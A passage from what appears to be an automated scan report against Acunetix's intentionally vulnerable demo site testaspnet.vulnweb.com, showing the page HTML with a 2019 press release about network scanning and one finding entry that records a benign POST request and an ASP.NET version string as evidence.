uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmJ1aWxkIDEyLjAuMTkwNTE1MTQ5PC9hPikuIFRoaXMgbmV3IGJ1aWxkIGFsc28gaW5jbHVkZXM6PC9wPiAgICAgPHA+LSBTdXBwb3J0IGZvciBJUHY2PGJyIC8+ICAgICAtIEltcHJvdmVkIHVzYWdlIG9mIG1hY2hpbmUgcmVzb3VyY2VzPGJyIC8+ICAgICAtIEFkZGVkIHN1cHBvcnQgZm9yIFNlbGVuaXVtIHNjcmlwdHMgYXMgaW1wb3J0IGZpbGVzPGJyIC8+ICAgICAtIE11bHRpcGxlIHZ1bG5lcmFiaWxpdHkgY2hlY2tzIGZvciBTQVA8YnIgLz4gICAgIC0gVW5hdXRob3JpemVkIGFjY2VzcyBkZXRlY3Rpb24gZm9yIFJlZGlzIGFuZCBNZW1jYWNoZWQ8YnIgLz4gICAgIC0gU291cmNlIGNvZGUgZGlzY2xvc3VyZSBmb3IgUnVieSBhbmQgUHl0aG9uPC9wPiAgICAgPHA+VGhlIG5ldyBidWlsZCBhbHNvIGluY2x1ZGVzIGEgbnVtYmVyIG9mIHVwZGF0ZXMgYW5kIGZpeGVzLCBhbGwgb2Ygd2hpY2ggYXJlIGF2YWlsYWJsZSBmb3IgYm90aCBXaW5kb3dzIGFuZCBMaW51eC4gTW9yZSBpbmZvcm1hdGlvbiBjYW4gYmUgZm91bmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmhlcmU8L2E+LjwvcD4gICAgIDxwPkdldCBhIGRlbW8gb2YgdGhlIHByb2R1Y3QgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vbmV0d29yay1zZWN1cml0eS1zY2FubmVyLz5oZXJlPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD4gICAgIDxwPjxzdHJvbmc+QWN1bmV0aXgsIHRoZSBDb21wYW55PC9zdHJvbmc+PC9wPiAgICAgPHA+Rm91bmRlZCBpbiAyMDA0IHRvIGNvbWJhdCB0aGUgYWxhcm1pbmcgcmlzZSBpbiB3ZWIgYXBwbGljYXRpb24gYXR0YWNrcywgQWN1bmV0aXggaXMgdGhlIG1hcmtldCBsZWFkZXIgYW5kIGEgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHRlY2hub2xvZ3kuIEZyb20gaW5kaXZpZHVhbCBjb25zdWx0YW50cyB0byBlbnRlcnByaXNlcywgcGVuZXRyYXRpb24gdGVzdGVycyBhbmQgc2VjdXJpdHkgZXhwZXJ0cyBnbG9iYWxseSBkZXBlbmQgb24gQWN1bmV0aXggcHJvZHVjdHMgYW5kIHRlY2hub2xvZ2llcy4gSXQgaXMgdGhlIHRvb2wgb2YgY2hvaWNlIGZvciBtYW55IGN1c3RvbWVycyBhY3Jvc3Mgc2VjdG9ycywgaW5jbHVkaW5nIEdvdmVybm1lbnQsIE1pbGl0YXJ5LCBFZHVjYXRpb24sIFRlbGVjb21tdW5pY2F0aW9ucywgQmFua2luZywgRmluYW5jZSwgYW5kIEUtQ29tbWVyY2Ugc2VjdG9ycyBhcyB3ZWxsIGFzIG1hbnkgRm9ydHVuZSA1MDAgY29tcGFuaWVzIHN1Y2ggYXMgdGhlIFBlbnRhZ29uLCBIYXJwZXIgQ29sbGlucywgRGlzbmV5LCBBZG9iZSwgYW5kIG1hbnkgbW9yZS48L3A+ZAIJDw8WBB4EVGV4dAUSUmVhZCB1c2VyIGNvbW1lbnRzHgtOYXZpZ2F0ZVVybAUSQ29tbWVudHMuYXNweD9pZD0wZGQCCw8WAh4Dc3JjZGRkfC/V3VUyYDVyDam3PHmHmEHBfQA=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKZgbWNCQL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBGZvvLHX89VirHfgZv59zKO75WKS" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>5/16/2019 12:32:30 PM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</DIV> <DIV id="divNewsLong" class="NewsLong"><p><strong>London, UK</strong> – <strong>May 2019</strong> – Acunetix, the pioneer in automated web application security software, has announced that all versions of the <a href=https://www.acunetix.com/vulnerability-scanner/>Acunetix Vulnerability Scanner</a> now support <a href=https://www.acunetix.com/vulnerability-scanner/network-security-scanner/>network security scanning</a>. Network security scans are possible thanks to the seamless integration of Acunetix with the powerful OpenVAS security solution. Until now, network security scanning functionality was available only in Acunetix Online.</p> <p>“No matter the size of your business, you use multiple security measures to alleviate different types of risks. Your security strategy must always include both web security scans and network security scans. And it makes it so much easier and much more efficient if you can do the two together using a single integrated tool,” said Nicolas Sciberras, CTO.</p> <p>There are many advantages of running network security scans in Acunetix. Having a single integrated dashboard with both web and network vulnerabilities gives the best possible risk visibility and saves a lot of time and effort. Network scans may also benefit from other Acunetix features, such as <a href=https://www.acunetix.com/vulnerability-scanner/acunetix-integrations/>issue tracker integration</a> and <a href=https://www.acunetix.com/vulnerability-scanner/vulnerability-management-regulatory-compliance/>comprehensive reporting</a>.</p> <p><strong>More Features in the Latest Build</strong></p> <p>OpenVAS integration is introduced as part of the latest Acunetix version 12 build (<a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>build 12.0.190515149</a>). This new build also includes:</p> <p>- Support for IPv6<br /> - Improved usage of machine resources<br /> - Added support for Selenium scripts as import files<br /> - Multiple vulnerability checks for SAP<br /> - Unauthorized access detection for Redis and Memcached<br /> - Source code disclosure for Ruby and Python</p> <p>The new build also includes a number of updates and fixes, all of which are available for both Windows and Linux. More information can be found <a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>here</a>.</p> <p>Get a demo of the product <a href=https://www.acunetix.com/network-security-scanner/>here</a>.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p> <p><strong>Acunetix, the Company</strong></p> <p>Founded in 2004 to combat the alarming rise in web application attacks, Acunetix is the market leader and a pioneer in automated web application security technology. From individual consultants to enterprises, penetration testers and security experts globally depend on Acunetix products and technologies. It is the tool of choice for many customers across sectors, including Government, Military, Education, Telecommunications, Banking, Finance, and E-Commerce sectors as well as many Fortune 500 companies such as the Pentagon, Harper Collins, Disney, Adobe, and many more.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=0">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/ReadNews.aspx?id=2
Method	POST
Parameter
Attack
Evidence	2.0.50727
Show / hide Request and Response
Request Header - size: 422 bytes.	POST http://testaspnet.vulnweb.com/ReadNews.aspx?id=2 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?id=2 Content-Length: 10937 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 10,937 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WAh8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT9kAgcPFgIfAQWbODxwPjxzdHJvbmc%2BQWN1bmV0aXggY29tYmF0cyByaXNlIGluIHdlYiBhdHRhY2tzIHdpdGggQWN1bmV0aXggICAgICAgICAgICAgICAgICAgICAgICAgICAgV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAyIDwvc3Ryb25nPjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD4yMSBKdWx5IDIwMDUgLSA8c3Ryb25nPlN0YXJ0LXVwIGNvbXBhbnkgQWN1bmV0aXggcmVsZWFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjogYSB0b29sIHRvIGF1dG9tYXRpY2FsbHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXVkaXQgd2Vic2l0ZSBzZWN1cml0eS4gQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAgICAgICAgICAgICAgICAgICAgICAgICAgICAyIGNyYXdscyBhbiBlbnRpcmUgd2Vic2l0ZSwgbGF1bmNoZXMgcG9wdWxhciB3ZWIgYXR0YWNrcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAoU1FMIEluamVjdGlvbiBldGMuKSBhbmQgaWRlbnRpZmllcyB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBuZWVkIHRvIGJlIGZpeGVkLjwvc3Ryb25nPiA8L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5TZWN1cmluZyB5b3VyIHdlYnNpdGUgc2hvdWxkIGJlIHlvdXIgbnVtYmVyIG9uZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjb25jZXJuPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFja2VycyBhcmUgY29uY2VudHJhdGluZyB0aGVpciBlZmZvcnRzIG9uIHdlYi1iYXNlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcHBsaWNhdGlvbnMgLSA3NSUgb2YgY3liZXIgYXR0YWNrcyBhcmUgZG9uZSBhdCB0aGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGxldmVsLCBhIEdhcnRuZXIgR3JvdXAgc3R1ZHkgaGFzIHJldmVhbGVkLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBXZWIgYXBwbGljYXRpb25zIGFyZSBhY2Nlc3NpYmxlIDI0IGhvdXJzIGEgZGF5LCA3IGRheXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgYSB3ZWVrIGFuZCBjb250cm9sIHZhbHVhYmxlIGRhdGEgc3VjaCBhcyBjdXN0b21lciBpbmZvcm1hdGlvbiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHJhbnNhY3Rpb24gaW5mb3JtYXRpb24gYW5kIGV2ZW4gcHJvcHJpZXRhcnkgY29ycG9yYXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGEuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc%2BNTAwLDAwMCBjdXN0b21lciBjcmVkaXQgY2FyZCBudW1iZXJzIG9idGFpbmVkIHZpYSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhIHdlYiBhdHRhY2s8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBXZWxsLWtub3duIHNpdGVzIHRoYXQgd2VyZSBvcGVuIHRvIHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGluY2x1ZGUgZmFzaGlvbiBsYWJlbCBHdWVzcyBhbmQgcGV0IHN1cHBseSByZXRhaWxlciAgICAgICAgICAgICAgICAgICAgICAgICAgICBQZXRDby5jb20gd2hvIHdlcmUgbm90b3Jpb3VzbHkgZm91bmQgdG8gYmUgdnVsbmVyYWJsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB0byB0aGUgU1FMIGluamVjdGlvbiB2dWxuZXJhYmlsaXR5IChKdW5lIDIwMDMpLiBUaGlzICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJlc3VsdGVkIGluIFBldENvIGxlYXZpbmcgYXMgbWFueSBhcyA1MDAsMDAwIGNyZWRpdCAgICAgICAgICAgICAgICAgICAgICAgICAgICBjYXJkIG51bWJlcnMgb3BlbiB0byBhbnlvbmUgYWJsZSB0byBjb25zdHJ1Y3QgdGhpcyBzcGVjaWFsbHktY3JhZnRlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBVUkwuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc%2BRmlyZXdhbGxzLCBTU0wgYW5kIGxvY2tlZC1kb3duIHNlcnZlcnMgYXJlIGZ1dGlsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBoYWNraW5nPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQW55IGRlZmVuc2UgYXQgbmV0d29yayBzZWN1cml0eSBsZXZlbCB3aWxsIHByb3ZpZGUgbm8gICAgICAgICAgICAgICAgICAgICAgICAgICAgcHJvdGVjdGlvbiBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzIHNpbmNlIHRoZXkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXJlIGxhdW5jaGVkIG9uIHBvcnQgODAgLSB3aGljaCBoYXMgdG8gcmVtYWluIG9wZW4uICAgICAgICAgICAgICAgICAgICAgICAgICAgIEluIGFkZGl0aW9uLCB3ZWIgYXBwbGljYXRpb25zIChjdXN0b21lciBhcmVhcywgc2hvcHBpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FydHMgZXRjLikgYXJlIG9mdGVuIHRhaWxvci1tYWRlLCBpbnZhcmlhYmx5IHRlc3RlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZXNzIHRoYW4gb2ZmLXRoZS1zaGVsZiBzb2Z0d2FyZSBhbmQgYXJlIHRoZXJlZm9yZSBtb3JlICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN1c2NlcHRpYmxlIHRvIGF0dGFjay48L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BJnF1b3Q7Q29tcGFuaWVzIGhhdmUgaW1wbGVtZW50ZWQgbmV0d29yay1sZXZlbCBzZWN1cml0eSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaG93ZXZlciB0aGV5IGZhaWwgdG8gYXVkaXQgYW5kIHNlY3VyZSB0aGVpciB3ZWIgYXBwbGljYXRpb25zLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBUaGVzZSBhcHBsaWNhdGlvbnMgaGF2ZSBhY2Nlc3MgdG8gc2Vuc2l0aXZlIGRhdGEgYW5kICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFyZSBhIGhhY2tlcidzIHByaW1lIHRhcmdldCwmcXVvdDsgc2FpZCBOaWNrIEdhbGVhLCAgICAgICAgICAgICAgICAgICAgICAgICAgICBDRU8gb2YgQWN1bmV0aXguICZxdW90O0F1ZGl0aW5nIG9uZSdzIHdlYiBhcHBzIHNob3VsZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBiZSB0aGUgbnVtYmVyIG9uZSBzZWN1cml0eSBjb25jZXJuLiZxdW90OzwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlRoZSBuZWVkIGZvciBhbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHZ1bG5lcmFiaWxpdHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2Nhbm5lcjwvc3Ryb25nPjxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIE1hbnVhbGx5IGF1ZGl0aW5nIGEgd2ViIGFwcGxpY2F0aW9uIGZvciB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdG8gU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdHRhY2tzIGlzIHZpcnR1YWxseSBpbXBvc3NpYmxlLiBXaXRoIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5ICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNjYW5uZXIgdGhlIHByb2Nlc3Mgb2YgYXVkaXRpbmcgd2ViIGFwcGxpY2F0aW9ucyBzdWNoICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFzIHNob3B